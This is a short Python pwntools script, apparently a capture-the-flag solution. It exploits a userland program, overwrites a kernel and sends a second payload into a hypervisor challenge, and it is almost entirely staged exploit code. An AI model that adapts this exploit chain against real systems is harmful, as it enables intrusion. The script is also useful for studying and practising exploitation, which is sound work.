from pwn import *
from binascii import hexlify
from assembler import assemble # This was my assembler for the userland program
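#################################
# STAGE -1: MAKE SURE YOU CHANGE ld.so.2 TO MATCH YOUR LINKER
#################################
#################################
# STAGE 0: COMPILE CODE AND DO STUFF
#################################
# Assemble the source that is later sent to the userland program
# (`assemble` is the project's own assembler, imported above).
code = assemble('exp3.asm')
# Requires nasm, so this is already compiled for you.
#p = process(['nasm', 'kernel_over.asm'])
#p.wait() # Assuming this is successful
# Build the contents of exp_kernel/ with make.
p = process(['make', '-C', 'exp_kernel'])
p.wait()  # NOTE(review): the exit status is not inspected, so a failed build is not detected here
# Read both payload files as raw bytes.  Binary mode avoids any text decoding
# of the file contents, and the `with` blocks close the handles instead of
# leaving them to the garbage collector as the bare open(...).read() did.
with open('kernel_over', 'rb') as f:
    data = f.read()
with open('exp_kernel/hack.bin', 'rb') as f:
    kern = f.read()
#p = remote('35.200.23.198', 31733)
#################################
# STAGE 1: EXPLOIT THE USERLAND PROGRAM
#################################
# Start the local hypervisor with the kernel image, the dynamic linker and
# the user program, then hand the assembled code to it on one line.
p = process(['./hypervisor.elf', 'kernel.bin', 'ld.so.2', './user.elf'])
p.sendline(code)
#################################
# STAGE 2: OVERRIDE KERNEL
#################################
# Wait for the NUL-terminated prompt before writing the kernel_over bytes;
# the prompt string must match the target binary exactly, NUL included.
p.recvuntil('Please enter code to override kernel with:\0')
p.send(data)
#p.interactive()
#################################
# STAGE 3: SEND OUR LARGER EXPLOIT CODE PAYLOAD
#################################
# Same pattern for the second stage: block on the prompt, then send hack.bin.
p.recvuntil('Kernel code please: ')
p.send(kern)
# Hand the session over to the operator.
p.interactive()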